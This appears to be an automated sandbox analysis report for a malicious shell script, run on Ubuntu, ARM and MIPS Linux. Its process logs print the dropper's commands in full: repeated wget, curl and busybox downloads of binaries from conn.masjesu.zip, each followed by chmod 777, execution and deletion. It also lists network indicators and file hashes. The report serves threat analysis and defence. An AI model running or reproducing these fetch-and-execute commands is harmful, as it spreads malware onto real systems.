Analysis Overview
SHA256
57d39cde21ad2ac6d53e7c94150e4c9c363fc38e10989a6740c21c47f8c19649
Threat Level: Shows suspicious behavior
The file 57d39cde21ad2ac6d53e7c94150e4c9c363fc38e10989a6740c21c47f8c19649.sh was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Executes dropped EXE
Checks CPU configuration
Writes file to tmp directory
System Network Configuration Discovery
Reads runtime system information
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-21 05:04
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-21 05:03
Reported
2024-11-21 05:10
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
148s
Max time network
129s
Command Line
Signatures
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Processes
/tmp/57d39cde21ad2ac6d53e7c94150e4c9c363fc38e10989a6740c21c47f8c19649.sh
[/tmp/57d39cde21ad2ac6d53e7c94150e4c9c363fc38e10989a6740c21c47f8c19649.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| GB | 185.125.188.61:443 | tcp | |
| GB | 185.125.188.61:443 | tcp | |
| US | 151.101.193.91:443 | tcp | |
| US | 151.101.193.91:443 | tcp | |
| GB | 195.181.164.14:443 | tcp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-21 05:03
Reported
2024-11-21 05:10
Platform
debian9-armhf-20240729-en
Max time kernel
149s
Max time network
3s
Command Line
Signatures
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Processes
/tmp/57d39cde21ad2ac6d53e7c94150e4c9c363fc38e10989a6740c21c47f8c19649.sh
[/tmp/57d39cde21ad2ac6d53e7c94150e4c9c363fc38e10989a6740c21c47f8c19649.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-21 05:03
Reported
2024-11-21 05:10
Platform
debian9-mipsbe-20240418-en
Max time kernel
149s
Max time network
65s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM | /tmp/uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM | N/A |
| N/A | /tmp/Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE | /tmp/Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE | N/A |
| N/A | /tmp/eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ | /tmp/eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ | N/A |
| N/A | /tmp/6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik | /tmp/6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik | N/A |
| N/A | /tmp/WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq | /tmp/WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq | N/A |
| N/A | /tmp/bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN | /tmp/bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN | N/A |
| N/A | /tmp/yhuFpgnqmroDbPC5o9RCJieYW1CFOnQDYc | /tmp/yhuFpgnqmroDbPC5o9RCJieYW1CFOnQDYc | N/A |
| N/A | /tmp/SfInoCDmB6zQx1NlaBv6CjHcnO0lcJ3wNX | /tmp/SfInoCDmB6zQx1NlaBv6CjHcnO0lcJ3wNX | N/A |
| N/A | /tmp/ELfm8a3wKCyvHLOz2xFrbBioqCoX4SPqt5 | /tmp/ELfm8a3wKCyvHLOz2xFrbBioqCoX4SPqt5 | N/A |
| N/A | /tmp/ReS1F25hvGPCIW4ckz6bbIqnItZmdnBSxm | /tmp/ReS1F25hvGPCIW4ckz6bbIqnItZmdnBSxm | N/A |
| N/A | /tmp/zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f | /tmp/zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f | N/A |
| N/A | /tmp/nHQ7bZHL7csrB6Ps3rFIYrulC4l3OPemLD | /tmp/nHQ7bZHL7csrB6Ps3rFIYrulC4l3OPemLD | N/A |
| N/A | /tmp/asIYHC8adseWEP5b4sxsU9yXJskkGiXN3y | /tmp/asIYHC8adseWEP5b4sxsU9yXJskkGiXN3y | N/A |
| N/A | /tmp/Xz9ULkwZLi7lBEguACB84kLTXA7Rx7h1OQ | /tmp/Xz9ULkwZLi7lBEguACB84kLTXA7Rx7h1OQ | N/A |
| N/A | /tmp/zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f | /tmp/zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/ELfm8a3wKCyvHLOz2xFrbBioqCoX4SPqt5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM | /usr/bin/curl | N/A |
| File opened for modification | /tmp/SfInoCDmB6zQx1NlaBv6CjHcnO0lcJ3wNX | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f | /usr/bin/curl | N/A |
| File opened for modification | /tmp/asIYHC8adseWEP5b4sxsU9yXJskkGiXN3y | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE | /usr/bin/curl | N/A |
| File opened for modification | /tmp/eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/yhuFpgnqmroDbPC5o9RCJieYW1CFOnQDYc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ReS1F25hvGPCIW4ckz6bbIqnItZmdnBSxm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/nHQ7bZHL7csrB6Ps3rFIYrulC4l3OPemLD | /usr/bin/curl | N/A |
| File opened for modification | /tmp/6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq | /usr/bin/curl | N/A |
| File opened for modification | /tmp/bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Xz9ULkwZLi7lBEguACB84kLTXA7Rx7h1OQ | /usr/bin/curl | N/A |
Processes
/tmp/57d39cde21ad2ac6d53e7c94150e4c9c363fc38e10989a6740c21c47f8c19649.sh
[/tmp/57d39cde21ad2ac6d53e7c94150e4c9c363fc38e10989a6740c21c47f8c19649.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM]
/bin/chmod
[chmod 777 uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM]
/tmp/uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM
[./uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM]
/bin/rm
[rm uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE]
/bin/chmod
[chmod 777 Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE]
/tmp/Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE
[./Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE]
/bin/rm
[rm Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ]
/bin/chmod
[chmod 777 eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ]
/tmp/eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ
[./eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ]
/bin/rm
[rm eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik]
/bin/chmod
[chmod 777 6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik]
/tmp/6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik
[./6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik]
/bin/rm
[rm 6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq]
/bin/chmod
[chmod 777 WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq]
/tmp/WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq
[./WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq]
/bin/rm
[rm WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN]
/bin/chmod
[chmod 777 bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN]
/tmp/bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN
[./bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN]
/bin/rm
[rm bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/yhuFpgnqmroDbPC5o9RCJieYW1CFOnQDYc]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/yhuFpgnqmroDbPC5o9RCJieYW1CFOnQDYc]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/yhuFpgnqmroDbPC5o9RCJieYW1CFOnQDYc]
/bin/chmod
[chmod 777 yhuFpgnqmroDbPC5o9RCJieYW1CFOnQDYc]
/tmp/yhuFpgnqmroDbPC5o9RCJieYW1CFOnQDYc
[./yhuFpgnqmroDbPC5o9RCJieYW1CFOnQDYc]
/bin/rm
[rm yhuFpgnqmroDbPC5o9RCJieYW1CFOnQDYc]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/SfInoCDmB6zQx1NlaBv6CjHcnO0lcJ3wNX]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/SfInoCDmB6zQx1NlaBv6CjHcnO0lcJ3wNX]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/SfInoCDmB6zQx1NlaBv6CjHcnO0lcJ3wNX]
/bin/chmod
[chmod 777 SfInoCDmB6zQx1NlaBv6CjHcnO0lcJ3wNX]
/tmp/SfInoCDmB6zQx1NlaBv6CjHcnO0lcJ3wNX
[./SfInoCDmB6zQx1NlaBv6CjHcnO0lcJ3wNX]
/bin/rm
[rm SfInoCDmB6zQx1NlaBv6CjHcnO0lcJ3wNX]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/ELfm8a3wKCyvHLOz2xFrbBioqCoX4SPqt5]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/ELfm8a3wKCyvHLOz2xFrbBioqCoX4SPqt5]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/ELfm8a3wKCyvHLOz2xFrbBioqCoX4SPqt5]
/bin/chmod
[chmod 777 ELfm8a3wKCyvHLOz2xFrbBioqCoX4SPqt5]
/tmp/ELfm8a3wKCyvHLOz2xFrbBioqCoX4SPqt5
[./ELfm8a3wKCyvHLOz2xFrbBioqCoX4SPqt5]
/bin/rm
[rm ELfm8a3wKCyvHLOz2xFrbBioqCoX4SPqt5]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/ReS1F25hvGPCIW4ckz6bbIqnItZmdnBSxm]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/ReS1F25hvGPCIW4ckz6bbIqnItZmdnBSxm]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/ReS1F25hvGPCIW4ckz6bbIqnItZmdnBSxm]
/bin/chmod
[chmod 777 ReS1F25hvGPCIW4ckz6bbIqnItZmdnBSxm]
/tmp/ReS1F25hvGPCIW4ckz6bbIqnItZmdnBSxm
[./ReS1F25hvGPCIW4ckz6bbIqnItZmdnBSxm]
/bin/rm
[rm ReS1F25hvGPCIW4ckz6bbIqnItZmdnBSxm]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f]
/bin/chmod
[chmod 777 zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f]
/tmp/zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f
[./zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f]
/bin/rm
[rm zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/nHQ7bZHL7csrB6Ps3rFIYrulC4l3OPemLD]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/nHQ7bZHL7csrB6Ps3rFIYrulC4l3OPemLD]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/nHQ7bZHL7csrB6Ps3rFIYrulC4l3OPemLD]
/bin/chmod
[chmod 777 nHQ7bZHL7csrB6Ps3rFIYrulC4l3OPemLD]
/tmp/nHQ7bZHL7csrB6Ps3rFIYrulC4l3OPemLD
[./nHQ7bZHL7csrB6Ps3rFIYrulC4l3OPemLD]
/bin/rm
[rm nHQ7bZHL7csrB6Ps3rFIYrulC4l3OPemLD]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/asIYHC8adseWEP5b4sxsU9yXJskkGiXN3y]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/asIYHC8adseWEP5b4sxsU9yXJskkGiXN3y]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/asIYHC8adseWEP5b4sxsU9yXJskkGiXN3y]
/bin/chmod
[chmod 777 asIYHC8adseWEP5b4sxsU9yXJskkGiXN3y]
/tmp/asIYHC8adseWEP5b4sxsU9yXJskkGiXN3y
[./asIYHC8adseWEP5b4sxsU9yXJskkGiXN3y]
/bin/rm
[rm asIYHC8adseWEP5b4sxsU9yXJskkGiXN3y]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Xz9ULkwZLi7lBEguACB84kLTXA7Rx7h1OQ]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Xz9ULkwZLi7lBEguACB84kLTXA7Rx7h1OQ]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Xz9ULkwZLi7lBEguACB84kLTXA7Rx7h1OQ]
/bin/chmod
[chmod 777 Xz9ULkwZLi7lBEguACB84kLTXA7Rx7h1OQ]
/tmp/Xz9ULkwZLi7lBEguACB84kLTXA7Rx7h1OQ
[./Xz9ULkwZLi7lBEguACB84kLTXA7Rx7h1OQ]
/bin/rm
[rm Xz9ULkwZLi7lBEguACB84kLTXA7Rx7h1OQ]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f]
/bin/chmod
[chmod 777 zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f]
/tmp/zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f
[./zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f]
/bin/rm
[rm zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/nHQ7bZHL7csrB6Ps3rFIYrulC4l3OPemLD]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/nHQ7bZHL7csrB6Ps3rFIYrulC4l3OPemLD]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
Files
/tmp/uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
